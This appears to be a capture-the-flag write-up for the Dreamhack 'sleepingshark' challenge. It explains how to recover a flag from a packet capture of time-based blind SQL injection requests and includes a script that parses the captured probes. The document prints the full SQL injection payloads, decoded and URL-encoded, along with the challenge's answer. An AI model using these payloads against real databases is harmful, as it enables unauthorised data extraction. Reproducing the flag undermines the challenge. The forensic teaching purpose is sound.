sleepingshark | Wargame | Dreamhack
sleepingshark
Do shark sleep?
dreamhack.io


The string "flag" appears in the HTTP traffic.

URL-decoding this URL gives ..

(This is an HTTP request that attempts a time-based blind SQL injection.
A single URI like this only checks one character, so recovering the whole flag means repeating the analysis across many requests or automating it.)
_ws.col.info == "POST /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),34,1))=45, SLEEP(3), 0) HTTP/1.1 "
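Analysis:
SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),34,1)
→ extracts the 34th character of the flag
ASCII(...) = 45
→ checks whether that character's ASCII code is 45 (character 45: hyphen (-))
IF(..., SLEEP(3), 0)
→ if it matches, wait 3 seconds; otherwise respond immediately
In other words, it asks "is the 34th character of the flag a - ?"
In Wireshark, filter for only the requests where SLEEP(3) actually ran (tcp.time_delta > 3)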

Decode each of these URIs one by one to find the flag..
URI
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C1%2C1%29%29%3D71%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C19%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C2%2C1%29%29%3D111%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C10%2C1%29%29%3D66%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C7%2C1%29%29%3D109%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C28%2C1%29%29%3D110%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C6%2C1%29%29%3D49%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C9%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C15%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C16%2C1%29%29%3D53%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C30%2C1%29%29%3D119%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C33%2C1%29%29%3D104%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C32%2C1%29%29%3D55%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C4%2C1%29%29%3D123%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C31%2C1%29%29%3D73%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C23%2C1%29%29%3D51%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C13%2C1%29%29%3D51%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C26%2C1%29%29%3D105%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C18%2C1%29%29%3D76%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C11%2C1%29%29%3D52%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C22%2C1%29%29%3D106%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C12%2C1%29%29%3D115%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C20%2C1%29%29%3D73%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C39%2C1%29%29%3D125%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C36%2C1%29%29%3D99%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C25%2C1%29%29%3D55%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C14%2C1%29%29%3D100%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C5%2C1%29%29%3D84%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C34%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C8%2C1%29%29%3D69%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C21%2C1%29%29%3D110%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C17%2C1%29%29%3D81%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C35%2C1%29%29%3D80%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C3%2C1%29%29%3D78%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C29%2C1%29%29%3D95%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C38%2C1%29%29%3D112%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C27%2C1%29%29%3D48%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C24%2C1%29%29%3D99%2C%20SLEEP%283%29%2C%200%29]
[Request URI: /?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t%20LIMIT%201%29%2C37%2C1%29%29%3D52%2C%20SLEEP%283%29%2C%200%29]
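Decoded, they look like the list below. The number highlighted in yellow (the position argument of SUBSTRING) is the character index, so the ASCII code values highlighted in red (the number after the = sign) have to be arranged in index order.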
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),1,1))=71, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),19,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),2,1))=111, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),10,1))=66, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),7,1))=109, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),28,1))=110, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),6,1))=49, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),9,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),15,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),16,1))=53, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),30,1))=119, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),33,1))=104, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),32,1))=55, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),4,1))=123, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),31,1))=73, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),23,1))=51, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),13,1))=51, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),26,1))=105, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),18,1))=76, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),11,1))=52, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),22,1))=106, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),12,1))=115, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),20,1))=73, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),39,1))=125, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),36,1))=99, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),25,1))=55, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),14,1))=100, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),5,1))=84, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),34,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),8,1))=69, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),21,1))=110, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),17,1))=81, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),35,1))=80, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),3,1))=78, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),29,1))=95, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),38,1))=112, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),27,1))=48, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),24,1))=99, SLEEP(3), 0)]
[Request URI: /?q=SELECT IF(ASCII(SUBSTRING((SELECT flag FROM s3cr3t LIMIT 1),37,1))=52, SLEEP(3), 0)]

Summary:
| Index | ASCII code | Character |
|---|---|---|
| 1 | 71 | G |
| 2 | 111 | o |
| 3 | 78 | N |
| 4 | 123 | { |
| 5 | 84 | T |
| 6 | 49 | 1 |
| 7 | 109 | m |
| 8 | 69 | E |
| 9 | 95 | _ |
| 10 | 66 | B |
| 11 | 52 | 4 |
| 12 | 115 | s |
| 13 | 51 | 3 |
| 14 | 100 | d |
| 15 | 95 | _ |
| 16 | 53 | 5 |
| 17 | 81 | Q |
| 18 | 76 | L |
| 19 | 95 | _ |
| 20 | 73 | I |
| 21 | 110 | n |
| 22 | 106 | j |
| 23 | 51 | 3 |
| 24 | 99 | c |
| 25 | 55 | 7 |
| 26 | 105 | i |
| 27 | 48 | 0 |
| 28 | 110 | n |
| 29 | 95 | _ |
| 30 | 119 | w |
| 31 | 73 | I |
| 32 | 55 | 7 |
| 33 | 104 | h |
| 34 | 95 | _ |
| 35 | 80 | P |
| 36 | 99 | c |
| 37 | 52 | 4 |
| 38 | 112 | p |
| 39 | 125 | } |
Flag:
GoN{T1mE_B4s3d_5QL_Inj3c7i0n_wI7h_Pc4p}
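
The manual steps above (keep only the delayed requests, URL-decode, read the index and ASCII code, arrange by index) can be automated when reviewing a capture like this. The script below is an added example, not part of the original post: the function names, the `(delay, uri)` record shape and the delay values are assumptions constructed for illustration, while the URI format is the one shown on this page.

```python
import re
from urllib.parse import unquote

# Matches the probe shape shown on this page: SUBSTRING((...),<pos>,1))=<code>
PROBE_RE = re.compile(r"SUBSTRING\(\(.+?\),\s*(\d+),\s*1\)\)\s*=\s*(\d+)")

def parse_probe(uri):
    """Return (position, ascii_code) for one probe URI, or None if it is not a probe."""
    m = PROBE_RE.search(unquote(uri))
    return (int(m.group(1)), int(m.group(2))) if m else None

def recover_leaked_value(records, delay_threshold=3.0):
    """Rebuild the string that the delayed probes confirmed.

    records: iterable of (response_delay_seconds, request_uri).
    A probe counts as confirmed only if its delay exceeds delay_threshold,
    mirroring the tcp.time_delta > 3 filter. Positions with no confirmed
    probe are rendered as '?' so gaps in the capture stay visible.
    """
    confirmed = {}
    for delay, uri in records:
        probe = parse_probe(uri)
        if probe is None or delay <= delay_threshold:
            continue
        pos, code = probe
        confirmed[pos] = chr(code)
    if not confirmed:
        return ""
    return "".join(confirmed.get(i, "?") for i in range(1, max(confirmed) + 1))

# URL-encoded request format from this page, with position and code left open.
TEMPLATE = ("/?q=SELECT%20IF%28ASCII%28SUBSTRING%28%28SELECT%20flag%20FROM%20s3cr3t"
            "%20LIMIT%201%29%2C{pos}%2C1%29%29%3D{code}%2C%20SLEEP%283%29%2C%200%29")

# Constructed sample: delays are invented; fast responses are probes that missed.
SAMPLE = [
    (3.02, TEMPLATE.format(pos=2, code=111)),
    (0.01, TEMPLATE.format(pos=34, code=45)),   # the example probe analyzed above
    (3.01, TEMPLATE.format(pos=1, code=71)),
    (3.03, TEMPLATE.format(pos=4, code=123)),
    (0.02, TEMPLATE.format(pos=3, code=77)),    # constructed miss
    (3.01, TEMPLATE.format(pos=3, code=78)),
    (3.02, TEMPLATE.format(pos=6, code=49)),    # position 5 deliberately absent
]

if __name__ == "__main__":
    print(recover_leaked_value(SAMPLE))
```

Fed with the delay and request URI of every HTTP request exported from the capture, the same function reproduces the table above without decoding each URI by hand.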